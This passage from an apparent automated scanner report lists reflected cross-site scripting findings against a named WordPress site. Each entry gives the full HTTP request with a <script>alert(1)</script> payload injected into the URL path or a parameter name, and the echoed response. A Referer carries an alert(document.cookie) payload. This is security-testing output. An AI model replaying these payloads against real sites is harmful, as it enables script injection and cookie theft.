Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokboxc74c9\"><script>alert(1)</script>4edf3969538/rokbox.js" type="hidden" />
...[SNIP]...

1.239. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40165"><script>alert(1)</script>d53db6d2961 was submitted in the REST URL parameter 6. This input was echoed as 40165\"><script>alert(1)</script>d53db6d2961 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js40165"><script>alert(1)</script>d53db6d2961 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js40165\"><script>alert(1)</script>d53db6d2961" type="hidden" />
...[SNIP]...

1.240. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bd62"><script>alert(1)</script>03e27be1078 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4bd62\"><script>alert(1)</script>03e27be1078 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js?4bd62"><script>alert(1)</script>03e27be1078=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:39 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:40 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/rokbox.js?4bd62\"><script>alert(1)</script>03e27be1078=1" type="hidden" />
...[SNIP]...

1.241. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3f1b"><script>alert(1)</script>d214d0ad366 was submitted in the REST URL parameter 1. This input was echoed as d3f1b\"><script>alert(1)</script>d214d0ad366 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd3f1b"><script>alert(1)</script>d214d0ad366/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:48 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-contentd3f1b\"><script>alert(1)</script>d214d0ad366/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.242. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45bbe"><script>alert(1)</script>90a104888c5 was submitted in the REST URL parameter 2. This input was echoed as 45bbe\"><script>alert(1)</script>90a104888c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes45bbe"><script>alert(1)</script>90a104888c5/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:10 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes45bbe\"><script>alert(1)</script>90a104888c5/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.243. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca80"><script>alert(1)</script>8d0a3cd6dd3 was submitted in the REST URL parameter 3. This input was echoed as dca80\"><script>alert(1)</script>8d0a3cd6dd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wpdca80"><script>alert(1)</script>8d0a3cd6dd3/js/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:21 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wpdca80\"><script>alert(1)</script>8d0a3cd6dd3/js/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.244. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b28"><script>alert(1)</script>45adaa0beb was submitted in the REST URL parameter 4. This input was echoed as f3b28\"><script>alert(1)</script>45adaa0beb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/jsf3b28"><script>alert(1)</script>45adaa0beb/rokbox/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:23 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/jsf3b28\"><script>alert(1)</script>45adaa0beb/rokbox/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.245. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e640"><script>alert(1)</script>9f16ced7beb was submitted in the REST URL parameter 5. This input was echoed as 6e640\"><script>alert(1)</script>9f16ced7beb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox6e640"><script>alert(1)</script>9f16ced7beb/themes/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:35 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox6e640\"><script>alert(1)</script>9f16ced7beb/themes/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.246. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce7de"><script>alert(1)</script>2ce3c9a591c was submitted in the REST URL parameter 6. This input was echoed as ce7de\"><script>alert(1)</script>2ce3c9a591c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themesce7de"><script>alert(1)</script>2ce3c9a591c/mynxx/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:56 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themesce7de\"><script>alert(1)</script>2ce3c9a591c/mynxx/rokbox-config.js" type="hidden" />
...[SNIP]...

1.247. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d04b"><script>alert(1)</script>3b5c28bd57a was submitted in the REST URL parameter 7. This input was echoed as 4d04b\"><script>alert(1)</script>3b5c28bd57a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4d04b"><script>alert(1)</script>3b5c28bd57a/rokbox-config.js HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:18:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:18:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx4d04b\"><script>alert(1)</script>3b5c28bd57a/rokbox-config.js" type="hidden" />
...[SNIP]...

1.248. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba175"><script>alert(1)</script>3789058eab0 was submitted in the REST URL parameter 8. This input was echoed as ba175\"><script>alert(1)</script>3789058eab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.jsba175"><script>alert(1)</script>3789058eab0 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:19:10 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:19:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.jsba175\"><script>alert(1)</script>3789058eab0" type="hidden" />
...[SNIP]...

1.249. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c650"><script>alert(1)</script>de1cab81c2b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5c650\"><script>alert(1)</script>de1cab81c2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?5c650"><script>alert(1)</script>de1cab81c2b=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:16:50 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:16:50 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-config.js?5c650\"><script>alert(1)</script>de1cab81c2b=1" type="hidden" />
...[SNIP]...

1.250. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9c52"><script>alert(1)</script>3d0d69d4637 was submitted in the REST URL parameter 1. This input was echoed as d9c52\"><script>alert(1)</script>3d0d69d4637 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contentd9c52"><script>alert(1)</script>3d0d69d4637/themes/rt_mynxx_wp/js/rokbox/themes/mynxx/rokbox-style.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:48 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44429

